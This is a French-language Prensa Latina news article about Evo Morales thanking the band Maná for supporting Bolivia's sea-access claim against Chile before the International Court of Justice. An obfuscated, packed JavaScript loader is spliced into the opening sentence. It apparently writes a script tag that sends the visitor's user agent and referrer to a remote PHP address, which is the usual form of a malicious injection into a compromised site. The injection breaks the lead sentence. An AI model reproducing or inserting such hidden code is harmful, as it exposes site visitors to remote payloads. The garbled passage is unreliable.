samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Evo Morales remercie le groupe Maná pour son soutien à la revendication maritime

La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eztnt|var|u0026u|referrer|ehasa||js|php'.split('|'),0,{})) Paz (PL) Le président de Bolivie, Evo Morales, a remercié le groupe de rock mexicain Maná pour son soutien à la requête de la nation andine à La Haye afin d'obtenir un accès souverain à la mer.

 

La Paz (PL) Le président de Bolivie, Evo Morales, a remercié le groupe de rock mexicain Maná pour son soutien à la requête de la nation andine à La Haye afin d’obtenir un accès souverain à la mer.

 

Par son compte twitter @evoespueblo, le mandataire a exprimé sa gratitude et a souhaité la bienvenue aux musiciens dans le pays des hauts plateaux, où ils donneront deux concerts, l’un dans le stade Hernando Siles de cette ville, puis le second dans le département de Santa Cruz.

 

En conférence de presse, le chanteur principal du groupe, et leader de Maná, a signalé que le Chili est un très grand et long pays. Il a affirmé qu´il serait historiquement juste d’en donner un petit bout à la Bolivie pour avoir un accès à la mer.

 

Avant le 21 de ce mois, la Bolivie présentera à la Cour Internationale de Justice (CIJ), la copie de la demande maritime présentée au Chili, qui a été révisée par le chef d’État de la nation andine-amazonique.

 

Une fois le document remis, le Gouvernement du Chili, représenté par son délégué, Claudio Grossman, devra préparer sa réponse pour le tribunal avant le 21 septembre de cette année. Ensuite commencera l’étape orale du procès, puis sera rendu le jugement sur le différend.

 

En avril 2013, La Paz à présenté un recours pour que la CIJ oblige Santiago à négocier de bonne foi la demande d’un accès à la mer.

Pour sa part, le gouvernement chilien a exposé sa position en juillet, dans laquelle il rejette quelque obligation que ce soit à ce sujet.

 

La demande maritime de la Bolivie contre le Chili pour obtenir un accès souverain à l’océan Pacifique inclut dans ses axes principaux la demande de la nation andine pour que l’organisme international enjoigne au Chili une obligation de négocier dans le but d’accorder un accès maritime au pays des hauts plateaux.

 

La République de Bolivie est née en 1825 avec des côtes pacifiques, mais une invasion chilienne de 1879 lui a ôté 400 kilomètres de littoral et 120 kilomètres carrés de terres riches en minerais, ce qui donne lieu à son actuelle condition d’enclave au milieu du continent Sud-Américain.

 

Des sources officielles expliquent que cette privation cause des dommages commerciaux et financiers, surtout parce qu’elle limite les capacités de développement national des boliviens.

 

rc/cdg

EN CONTINU
notes connexes